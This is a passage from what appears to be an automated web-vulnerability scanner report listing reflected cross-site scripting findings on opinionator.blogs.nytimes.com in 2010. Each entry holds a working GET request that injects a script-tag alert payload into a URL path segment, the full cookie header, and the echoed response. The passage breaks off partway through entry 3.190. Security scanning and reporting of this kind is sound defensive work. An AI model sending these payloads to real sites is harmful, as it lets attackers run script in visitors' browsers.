Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:12:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/feed4fd36\"><script>alert(1)</script>75e2794e565&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/allison-arieff/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c39"><script>alert(1)</script>39c9a1dd378 was submitted in the REST URL parameter 3. This input was echoed as 15c39\"><script>alert(1)</script>39c9a1dd378 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/allison-arieff/page15c39"><script>alert(1)</script>39c9a1dd378/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/page15c39\"><script>alert(1)</script>39c9a1dd378/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/dick-cavett

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea706"><script>alert(1)</script>3b4fefc3f96 was submitted in the REST URL parameter 2. This input was echoed as ea706\"><script>alert(1)</script>3b4fefc3f96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dick-cavettea706"><script>alert(1)</script>3b4fefc3f96 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavettea706\"><script>alert(1)</script>3b4fefc3f96&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/dick-cavett/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e8a"><script>alert(1)</script>fe172a7552a was submitted in the REST URL parameter 3. This input was echoed as 57e8a\"><script>alert(1)</script>fe172a7552a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dick-cavett/feed57e8a"><script>alert(1)</script>fe172a7552a/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:13:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:13:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/feed57e8a\"><script>alert(1)</script>fe172a7552a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/dick-cavett/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60706"><script>alert(1)</script>51866edec90 was submitted in the REST URL parameter 3. This input was echoed as 60706\"><script>alert(1)</script>51866edec90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dick-cavett/page60706"><script>alert(1)</script>51866edec90/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/page60706\"><script>alert(1)</script>51866edec90/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/disunion

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d78"><script>alert(1)</script>084625fe73a was submitted in the REST URL parameter 2. This input was echoed as 83d78\"><script>alert(1)</script>084625fe73a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion83d78"><script>alert(1)</script>084625fe73a HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion83d78\"><script>alert(1)</script>084625fe73a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/disunion/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1378a"><script>alert(1)</script>0da3b8f72d1 was submitted in the REST URL parameter 2. This input was echoed as 1378a\"><script>alert(1)</script>0da3b8f72d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion1378a"><script>alert(1)</script>0da3b8f72d1/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion1378a\"><script>alert(1)</script>0da3b8f72d1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/disunion/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f948"><script>alert(1)</script>7bb52e55484 was submitted in the REST URL parameter 3. This input was echoed as 6f948\"><script>alert(1)</script>7bb52e55484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion/feed6f948"><script>alert(1)</script>7bb52e55484/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/feed6f948\"><script>alert(1)</script>7bb52e55484&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/disunion/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf645"><script>alert(1)</script>7bdf5d8d7cb was submitted in the REST URL parameter 3. This input was echoed as bf645\"><script>alert(1)</script>7bdf5d8d7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion/pagebf645"><script>alert(1)</script>7bdf5d8d7cb/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/pagebf645\"><script>alert(1)</script>7bdf5d8d7cb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/errol-morris

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9789f"><script>alert(1)</script>f993fd38ae8 was submitted in the REST URL parameter 2. This input was echoed as 9789f\"><script>alert(1)</script>f993fd38ae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris9789f"><script>alert(1)</script>f993fd38ae8 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:21:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris9789f\"><script>alert(1)</script>f993fd38ae8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
